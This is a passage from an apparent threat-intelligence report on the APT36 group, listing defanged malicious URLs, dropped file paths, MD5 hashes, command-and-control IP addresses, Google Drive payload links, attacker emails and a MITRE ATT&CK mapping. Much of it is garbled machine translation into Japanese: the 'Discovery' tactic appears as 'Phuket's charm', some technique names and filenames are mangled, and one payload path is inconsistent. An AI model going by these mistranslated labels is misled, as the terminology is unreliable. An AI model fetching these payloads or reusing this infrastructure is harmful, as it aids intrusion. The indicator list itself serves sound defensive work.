| hxxps://campusportals[.]in/files/documents/bs/2.hta | |
| hxxps://campusportals[.]in/files/documents/xmlnsprcs.hta | |
| hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/ | |
| hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/newpictures.png | |
| hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/Salary_Increment_FY_2024.zip | |
| hxxps://dipl[.]site/Content/2022-23/01/03/ | |
| hxxps://dipl[.]site/Content/2022-23/01/03/Imge12542.hta | |
| hxxps://dipl[.]site/Content/2022-23/01/04/WhatsApp_Image_2024-05-06.zip | |
| hxxps://dipl[.]site/Content/2022-23/01/01/ | |
| hxxps://dipl[.]site/Content/2022-23/01/01/ugt254d.hta | |
| hxxps://dipl[.]site/Content/2022-23/01/02/US_China_standoff-Opportunity-for-India-Chadha-21-Aug-23.zip | |
| hxxps://slidesfinder[.]com/free-templates/freefiles/158/08978.png | |
| hxxps://slidesfinder[.]com/free-templates/freefiles/158/Letter002.pdf | |
| hxxps://slidesfinder[.]com/free-templates/freefiles/158/rt12.png | |
| hxxps://slidesfinder[.]com/free-templates/freefiles/158/rtloki.png | |
| hxxps://slidesfinder[.]com/free-templates/freefiles/158/tmps.dotm | |
| hxxps://mazagondoc[.]com/documents01/001doc.pdf | |
| hxxps://mazagondoc[.]com/documents01/08978.png | |
| hxxps://mazagondoc[.]com/documents01/Filezilla.exe | |
| hxxps://mazagondoc[.]com/documents01/Letter002.pdf | |
| hxxps://mazagondoc[.]com/documents01/rt12.png | |
| hxxps://mazagondoc[.]com/documents01/sigthief.py | |
| hxxps://mazagondoc[.]com/images/AdobeArm.exe | |
| hxxps://mazagondoc[.]com/images/AdobeReader.bat | |
| hxxps://mazagondoc[.]com/images/Chromes.exe | |
| hxxps://mazagondoc[.]com/images/awccs.bat | |
| hxxps://mazagondoc[.]com/images/igfxtk.bat | |
| hxxps://mazagondoc[.]com/images/igfxtk.exe | |
| hxxps://mazagondoc[.]com/images/msedg.bat | |
| hxxps://mazagondoc[.]com/images/msedg.exe | |
| hxxps://mazagondoc[.]com/images/msedgprefix.exe | |
| hxxps://mazagondoc[.]com/images/sigthief.py | |
| hxxps://mazagondoc[.]com/images/pdf/Naval_Projects_Payment_section_Report_29092023.docx | |
| hxxps://mazagondoc[.]com/images/pdf/cheexe.exe | |
| hxxps://mazagondoc[.]com/images/templates/Aerospace.dotm | |
| hxxps://mazagondoc[.]com/images/templates/Naval_Projects_Payment_section_Report_131023.docx | |
| hxxps://mazagondoc[.]com/images/templates/Slide7.png | |
| hxxps://mazagondoc[.]com/images/templates/logo.png | |
| hxxps://mazagondoc[.]com/images/templates/propritery/doc-logo.png | |
| hxxps://mazagondoc[.]com/images/word/Naval_Projects_Payment_section_Report_131023.docx | |
| hxxps://mazagondoc[.]com/images/word/プロジェクトおよびサービスセクションレポート_10102023.docx | |
| 主催者 | |
| C:\Windows\Tasks\useH.hta | |
| C:\Windows\Tasks\useT.hta | |
| C:\Windows\Tasks\alphaT.hta | |
| C:\Windows\Tasks\appH.bat | |
| C:\Windows\Tasks\appT.bat | |
| C:\Windows\Tasks\user01.bat | |
| C:\Windows\Tasks\user02.bat | |
| C:\ProgramData\VSUpdates\svirbre.exe | |
| C:\Users\user\AppData\Roaming\AdobeArm.exe | |
| C:\Users\user\AppData\Local\PrintsLogs\Postgres.exe | |
| C:\Users\Public\BroadCastHUB\DUser.dll | |
APT36
| f264ed8c76b1102ea55d73d931ab879b | 調査1.zip |
| 6065407484f1e22e814dfa00bd1fae06 | PCBL_05_25_JUNE_2024_IPs統合.pdf.デスクトップ |
| bdde8c9948142fafeec00d7094ae964f | LTC_チェックリスト.デスクトップ |
| bd9de1f98e8797926ab0fc9f2c6ca888 | 回転転送のPh-IIIに基づく転送の投稿。デスクトップ |
| 8b5bf198e4948d4fe6a4b0402f7246e5 | IAFT-1715.zip |
| 2bf596603c432fa46b494dc3edd2d30f | GTK-テーマ-Parse.txt |
| 3a65fbc14bd7ff12cda97282935eefd8 | インターネット利用状況調査フォーム_保護されています.pdf(デコイ) |
| ELF | |
| 4eaa6a69c9835c29ce8d39734e5d3d5f | パスワード(Golang ダウンローダー) |
| 4c52bb770d7b8639e1f305f908dbc800 | vmcoreinfo.txt (ディスゴモジ) |
| ポセイドン | |
| c5ef19c97462e791f21c32931975dc7b | ディストリビューション-dlna |
| b2d407d569e4b21ff12736dbc434577f | cjs-bin |
| 12aef7e734fb872f9160a1c2a47326d5 | bin-xdg |
| 7d6373d9f9a4270bd8af53f3861d7a9c | アクピッドディット |
| IP | |
| 165.22.221[。]71 178.128.166[。]148 152.42.162[。]105 161.35.207[。]209 159.65.146[。]80 157.245.100[。]177 |
ポセイドン |
| URLは | |
| hxxps://campusportals[.]in/myfiles/bdocuments/survey1.zip | |
| 165.22.221[.]71/ディストリビューション-dlna | |
| 178.128.166[.]148/cjs-bin | |
| 159.65.146[.]80/bin-xdg | |
| 157.245.100[.]177/acpid-dit | |
| hxxps://drive.google[.]com/file/d/1p9rewZLjJ3WUdmj_As6el9G5IPNtkEUN/view?usp=sharing | |
| hxxps://drive.google[.]com/file/d/1cAPvjfakAWIHVa_cZXw_iwLDqsIi1uRX/view?usp=sharing | |
| hxxps://drive.google[.]com/file/d/1cIxWwVrhS4L6EHiDKc8Ua86NtciC4Njx/view?usp=sharing | |
| hxxps://drive.google[.]com/uc?export=download&id=1dlI8jSabaeJT1MnQxiih0Ww-hZrG-GAe | |
| hxxps://drive.google[.]com/uc?export=download&id=1XvW8ir8l0G9axv4lhEvQFOxOyzmMV64t | |
| hxxps://drive.google[.]com/uc?export=download&id=1btUsB3nWehTNW8Cho9Wv3Efrt4c6EhI_ | |
| fikumatry@gmail[.]com | |
| fitfalcon0900@gmail[.]com | |
MITER ATT&CK
| 戦略 | テクニックID | 名前 |
| リソース開発 | T1583.001 T1584.001 T1587.001 T1588.001 T1588.002 T1608.001 T1608.005 |
インフラストラクチャの取得:ドメイン 侵害インフラストラクチャ: ドメイン 機能の開発:マルウェア 機能の取得:マルウェア 機能の取得:ツール ステージ機能:マルウェアのアップロード ステージ機能: リンクターゲット |
| 初期アクセス | T1566.001 T1566.002 |
フィッシング:スピアフィッシング添付ファイル フィッシング:スピアフィッシング リンク |
| 実行 | T1106 T1129 T1059 T1047 T1204.001 T1204.002 |
ネイティブAPI 共有モジュール コマンドおよびスクリプト インタプリタ Windowsの管理の実装 ユーザーの実行: 悪意のあるリンク ユーザーの実行:悪意のあるファイル |
| 固執 | T1053.003 T1547.001 T1547.013 |
スケジュールされたタスク/ジョブ: Cron レジストリ実行キー / スタートアップ フォルダー ブートまたはログオンの自動開始の実行: XDG 自動開始エントリ |
| 防衛回避 | T1027.010 T1036.005 T1036.007 T1140 T1218.005 T1574.002 T1027.009 T1027.010 |
コマンド難読化 マスカレード:正当な名前または場所と一致する マスカレード: 二重のファイル拡張子 ファイルまたは情報の難読化/デコード システムバイナリプロキシ実行: Mshta ハイジャック実行フロー:DLLサイドローディング 難読化されたファイルまたは情報: 埋め込まれたペイロード 難読化されたファイルまたは情報: コマンドの難読化 |
| プーケットの魅力 | T1012 T1016 T1033 T1057 T1082 T1083 T1518.001 |
クエリレジストリ システムネットワーク構成の検出 システム所有者/ユーザーの発見 プロセスディスカバリー システム情報の発見 ファイルとディレクトリの検出 ソフトウェアの発見: セキュリティ ソフトウェアの発見 |
| 収集 | T1005 T1056.001 T1074.001 T1119 T1113 T1125 |
ローカルシステムからのデータ 入力キャプチャ:キーロガー ステージングされたデータ:ローカルデータステージング 自動収集 スクリーンキャプチャ ビデオキャプチャを選択します。 |
| コマンドおよび制御 | T1105 T1571 T1573 T1071.001 |
入力ツール転送 非標準ポート 暗号化されたチャネル アプリケーション層プロトコル:Webプロトコル |
| exfiltration | T1020 T1041 T1567 |
自動流出 C2チャネルを介した浸透 Web サービスを介した漏洩 |
著者: サトウィック・ラム・プラッキ
